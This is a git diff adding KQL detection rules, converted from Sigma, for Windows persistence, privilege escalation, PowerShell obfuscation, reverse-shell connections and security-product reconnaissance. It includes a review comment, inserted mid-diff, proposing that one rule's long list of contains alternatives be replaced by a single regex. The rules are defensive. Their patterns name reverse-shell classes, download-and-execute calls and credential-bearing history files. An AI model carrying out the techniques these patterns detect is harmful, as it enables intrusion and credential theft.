+// Level: high
+// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1037.001
+// False Positives:
+// - Legitimate addition of Logon Scripts via the command line by administrators or third party tools
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql
new file mode 100644
index 00000000..9f3c9138
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql
@@ -0,0 +1,11 @@
+// Title: Potential Persistence Via Microsoft Compatibility Appraiser
+// Author: Sreeman
+// Date: 2020-09-29
+// Level: medium
+// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
+// In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql
new file mode 100644
index 00000000..90311d71
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Netsh Helper DLL
+// Author: Victor Sergeev, oscd.community
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql b/KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql
new file mode 100644
index 00000000..2906d3aa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Powershell Search Order Hijacking - Task
+// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-04-08
+// Level: high
+// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
new file mode 100644
index 00000000..f3ac8f24
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-14
+// Level: medium
+// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql b/KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql
new file mode 100644
index 00000000..7303a9b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql
@@ -0,0 +1,13 @@
+// Title: Potential PowerShell Command Line Obfuscation
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
+// Date: 2020-10-15
+// Level: high
+// Description: Detects the PowerShell command lines with special characters
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1027, attack.t1059.001
+// False Positives:
+// - Amazon SSM Document Worker
+// - Windows Defender ATP
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql
new file mode 100644
index 00000000..f4ea56e5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql
@@ -0,0 +1,13 @@
+// Title: Potential PowerShell Console History Access Attempt via History File
+// Author: Luc Génaux
+// Date: 2025-04-03
+// Level: medium
+// Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).
+// This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+// False Positives:
+// - Legitimate access of the console history file is possible
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ConsoleHost_history.txt" or ProcessCommandLine contains "(Get-PSReadLineOption).HistorySavePath"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql b/KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql
new file mode 100644
index 00000000..0594325f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Downgrade Attack
+// Author: Harish Segar (rule)
+// Date: 2020-03-20
+// Level: medium
+// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql b/KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql
new file mode 100644
index 00000000..2604f176
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Execution Policy Tampering - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: high
+// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql b/KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql
new file mode 100644
index 00000000..f994a390
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql
@@ -0,0 +1,11 @@
+// Title: Potential PowerShell Execution Via DLL
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-08-25
+// Level: high
+// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
+// This detection assumes that PowerShell commands are passed via the CommandLine.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql
new file mode 100644
index 00000000..6c8473d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql
@@ -0,0 +1,12 @@
+// Title: Potential PowerShell Obfuscation Via Reversed Commands
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: high
+// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql
new file mode 100644
index 00000000..977bfd90
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Obfuscation Via WCHAR/CHAR
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-09
+// Level: high
+// Description: Detects suspicious encoded character syntax often used for defense evasion
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "[char]0x" or ProcessCommandLine contains "(WCHAR)0x"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql b/KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql
new file mode 100644
index 00000000..339c452d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql
@@ -0,0 +1,12 @@
+// Title: Potential Powershell ReverseShell Connection
+// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-03-03
+// Level: high
+// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - In rare administrative cases, this function might be used to check network connectivity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql
new file mode 100644
index 00000000..46f43302
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql
@@ -0,0 +1,13 @@
+// Title: Potential Privilege Escalation To LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-05-22
+// Level: high
+// Description: Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+// - Weird admins that rename their tools
+// - Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i 
-s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or 
ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine 
contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " 
 —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell") and (not((ProcessCommandLine contains "paexec" or ProcessCommandLine contains "PsExec" or ProcessCommandLine contains "accepteula")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql
new file mode 100644
index 00000000..40e96c35
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql
@@ -0,0 +1,10 @@
+// Title: Potential Privilege Escalation Using Symlink Between Osk and Cmd
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql
new file mode 100644
index 00000000..577d9e0a
--- /dev/null
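Review bot: The `| where` clause of the LOCAL SYSTEM rule (spanning the previous four lines) expands every dash variant and flag order into roughly 150 `contains` alternatives, which cannot be reviewed for completeness by eye and will silently drift from the Sigma source on the next regeneration. The same set is one case-insensitive regex: `| where ProcessCommandLine matches regex @"(?i) [-/–—―](s [-/–—―]i|i [-/–—―]s|s) (cmd|pwsh|powershell)" and not(ProcessCommandLine contains "paexec" or ProcessCommandLine contains "PsExec" or ProcessCommandLine contains "accepteula")`; the `(?i)` flag is needed because `contains` is case-insensitive while `matches regex` is not. If this expansion is emitted by the converter's handling of the Sigma dash modifier, the change belongs in the converter rather than in the committed file, and the regex form should be checked against the same sample events as the expanded form before swapping. The cmdkey rule further down shows the same expansion at smaller scale (` -l`, ` /l`, ` –l`, ` —l`, ` ―l`).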
+++ b/KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql
@@ -0,0 +1,10 @@
+// Title: Potential Privilege Escalation via Service Permissions Weakness
+// Author: Teymur Kheirkhabarov
+// Date: 2019-10-26
+// Level: high
+// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql b/KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql
new file mode 100644
index 00000000..349588db
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql
@@ -0,0 +1,10 @@
+// Title: Potential Process Execution Proxy Via CL_Invocation.ps1
+// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova
+// Date: 2020-10-14
+// Level: medium
+// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "SyncInvoke "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql b/KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql
new file mode 100644
index 00000000..821d1b96
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Process Injection Via Msra.EXE
+// Author: Alexander McDonald
+// Date: 2022-06-24
+// Level: high
+// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Legitimate use of Msra.exe
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..a969a81b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,14 @@
+// Title: Potential Product Class Reconnaissance Via Wmic.EXE
+// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products.
+// Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms.
+// This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "AntiSpywareProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..b5a3d18b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Product Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains " uninstall" or ProcessCommandLine contains " install")))
\ No newline at end of file
